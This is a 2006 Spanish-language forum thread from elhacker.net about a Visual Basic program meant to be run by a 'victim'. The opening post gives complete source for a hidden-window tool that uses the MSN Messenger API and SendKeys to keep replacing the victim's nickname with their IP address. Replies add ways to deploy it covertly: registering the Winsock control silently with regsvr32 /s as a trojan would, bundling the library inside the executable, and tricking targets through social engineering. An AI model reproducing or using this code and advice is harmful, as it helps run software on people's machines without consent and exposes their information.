elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Notificacion de la IP de tu victima por MSN
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Notificacion de la IP de tu victima por MSN  (Leído 4,699 veces)
yofoxD

Desconectado Desconectado

Mensajes: 169


Ver Perfil
Notificacion de la IP de tu victima por MSN
« en: 12 Febrero 2006, 06:12 am »

-Bueno aqui les traigo una idea para hacer que cuando la victima ejecute este programa su nick cambie de nombre  colocando el ip de este en su nick y que cada 10 segundos te aparescan 3 ventanitas mostrando el ip de la victma. Aqui les va el codigo:

Necesitas primero tener:

-El form con la propiedad visible en false
-2 command button
-1 textbox
-2 timer
  *El timer 1 con interval 9000,la propiedad enabled en false.
  *El timer 2 con interval 10000,la propiedad enabled en false.
-1 Winsock
-Agregar a las referencias del proyecto: Messenger APY Type Library

------------------------------------------------------------------------
Private WithEvents MSN As MessengerAPI.Messenger

Private Sub Form_Load()
Set MSN = New MessengerAPI.Messenger
Text1.Text = Winsock1.LocalIP     
Timer1.Enabled = True
End Sub

Private Sub Timer1_Timer()
Call command1_click
End Sub

Private Sub command1_click()
MSN.OptionsPages 0, MOPT_GENERAL_PAGE
MSN.OptionsPages 0, MOPT_GENERAL_PAGE
SendKeys Text1.Text & vbCrLf
Call Command2_Click
End Sub

Private Sub Command2_Click()
MSN.OptionsPages 0, MOPT_GENERAL_PAGE
MSN.OptionsPages 0, MOPT_GENERAL_PAGE
SendKeys Text1.Text & vbCrLf
Timer2.Enabled = True
End Sub

Private Sub Timer2_Timer()
MSN.MyStatus = MISTATUS_INVISIBLE
MSN.MyStatus = MISTATUS_ONLINE
MSN.MyStatus = MISTATUS_INVISIBLE
MSN.MyStatus = MISTATUS_ONLINE
MSN.MyStatus = MISTATUS_INVISIBLE
MSN.MyStatus = MISTATUS_ONLINE
End Sub

A lo mejor algunos se preguntaran porque use dos command button si tienen el mismo uso??, Pues lo hice simplemente para estar mas seguro de que se cambio el nick correctamente porque cuando lo intente con un solo command button aveces no me funcionaba, pero les recomiendo que dejen el codigo como se los puse, aunque ustedes son libres de cambiarlo a su preferencia siempre y cuando digan quien fue la fuente (Redshots).



En línea

Hendrix
In The Kernel Land
Colaborador
***
Desconectado Desconectado

Mensajes: 2.276



Ver Perfil WWW
Re: Notificacion de la IP de tu victima por MSN
« Respuesta #1 en: 12 Febrero 2006, 11:27 am »

Weno, esta IP le apareceria a todos sus kontactos tambien, no solo a ti, es mejor que en el timer sea de unos 50 segundos y que vuelva a poner la IP, porke es evidente que la viktima lo va a ver, y asi lograremos tener su IP en el nik....

Weno, Salu2

Hendrix



En línea

"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián
yofoxD

Desconectado Desconectado

Mensajes: 169


Ver Perfil
Re: Notificacion de la IP de tu victima por MSN
« Respuesta #2 en: 12 Febrero 2006, 17:19 pm »

si ya yo sabia eso solo les queria dar una idea a las personas que no saben, pero gracias igual por esa recomendacion
En línea

EpicMetal

Desconectado Desconectado

Mensajes: 13


Rebon... again


Ver Perfil
Re: Notificacion de la IP de tu victima por MSN
« Respuesta #3 en: 19 Febrero 2006, 01:05 am »

un par de dudas...

como agrego un wisock
como hago para que vuelva al viejo nick?
y.. si no tengo esa libreria, de donde la saco?
« Última modificación: 19 Febrero 2006, 01:34 am por EpicMetal » En línea

(\__/)
(='.'=) This is Bunny. Copy and paste bunny into
(")_(") your signature to help him gain world domination.
InfiniteLoop

Desconectado Desconectado

Mensajes: 31


Ver Perfil
Re: Notificacion de la IP de tu victima por MSN
« Respuesta #4 en: 19 Febrero 2006, 22:15 pm »

Proyecto--componentes--microsoft winsock control
Guardandolo i haciendo lo mismo
Si tienes vb instalado tendrás la libreria pero en el caso de ser troyano etc, tendrias que copiarselo al pc remoto en windows\system32 i hacer inicio--ejecutar--regsvr32 mswinsck.ocx
Ademas puedes añadirle el parametro /s para que no muestre el mensajito y cante menos

Saludos
En línea

yofoxD

Desconectado Desconectado

Mensajes: 169


Ver Perfil
Re: Notificacion de la IP de tu victima por MSN
« Respuesta #5 en: 20 Febrero 2006, 01:48 am »

Pues una pregunta ya te la respondio que es la de donde sacar el winsock y la otra para regresar el nick a su estado original simplemente matas el proceso o cierras el programa y te lo cambias normalmente. Este programa lo que hace es que cada cierto tiempo a la victima se le abra la ventana para cambiar su nick ( la ventana de opciones del msn) y este cambie su nick automaticamente por su ip y aparescan varias ventanas de que ha iniciado sesion para que asi todos puedan ver su ip.
En línea

yalosabes

Desconectado Desconectado

Mensajes: 87


Ver Perfil
Re: Notificacion de la IP de tu victima por MSN
« Respuesta #6 en: 20 Febrero 2006, 04:59 am »

Holas, un la verdad veo algo dificil, que alguien caiga con ese programa , porke la mayoria de computadoras no tiene winsock en su pc, y puede que el programa no se ejecute o salga un error, recomendaria usar netstat y de hay sacas la Ip
En línea

yofoxD

Desconectado Desconectado

Mensajes: 169


Ver Perfil
Re: Notificacion de la IP de tu victima por MSN
« Respuesta #7 en: 20 Febrero 2006, 05:49 am »

Si es muy probable que haya mucha gente q no caiga pero si llegaran a caer para que el winsock funcione podrias comprimir el winsock junto con el programa y se lo mandas, creo q deberia de funcionar. Aunque cuando la gente vea que se encuentra el winsock junto al programa debe ser algo sospechoso pero no todos saben de programacion asi que tampoco podriamos decir que es mala idea. Cualquier cosa es posible de hacer si es bien planeada solo se necesita un poco de ingenieria social para engañar a la victima
En línea

InfiniteLoop

Desconectado Desconectado

Mensajes: 31


Ver Perfil
Re: Notificacion de la IP de tu victima por MSN
« Respuesta #8 en: 20 Febrero 2006, 20:14 pm »

Eso no representa un problema, dispones de muchas posibilidades:
1-Simplemente lo empaquetas con inicio--ejecutar--iexpress.exe y tu programa al arrancar deberá copiar de su carpeta la libreria a system32 con filecopy para luego hacer shell "regsvr32 mswinsck.ocx"
De este modo ya tienes todo en el mismo ejecutable, aunque és algo cutre, lo mejor sería:
2-Añades la libreria al final del propio ejecutable y este al arrancar deberá extraerla de si mismo copiarla a system32 y lo mismo que antes.

Como digo el winsock no representa un problema, el problema és la propia esencia del programa: que es una cutrada. Sería más elegante que al decirle algo a su ventana, devolviera la respuesta a modo de bot, aunque ya no sería tan sencillo como lo expuesto.

Un saludo
En línea

TheGhost(Z)

Desconectado Desconectado

Mensajes: 230



Ver Perfil
Re: Notificacion de la IP de tu victima por MSN
« Respuesta #9 en: 21 Febrero 2006, 12:28 pm »

Código:
-Agregar a las referencias del proyecto: Messenger APY Type Library


Como agrego esto. Me meti a agreagar componentes pero no ecnuentro ninguno con este nombre..?
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Ver por la cam de una victima
Hacking
zenit10 1 3,661 Último mensaje 17 Octubre 2011, 00:32 am
por Uxio
Víctima fraude NYBOA (53aaaa.com)
Dudas Generales
Juanjo 51 5 4,185 Último mensaje 26 Marzo 2023, 08:50 am
por MCKSys Argentina
Víctima fraude Nyboa « 1 2 3 »
Foro Libre
Jaumegim 20 10,612 Último mensaje 19 Mayo 2023, 09:12 am
por Juanjo 51
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines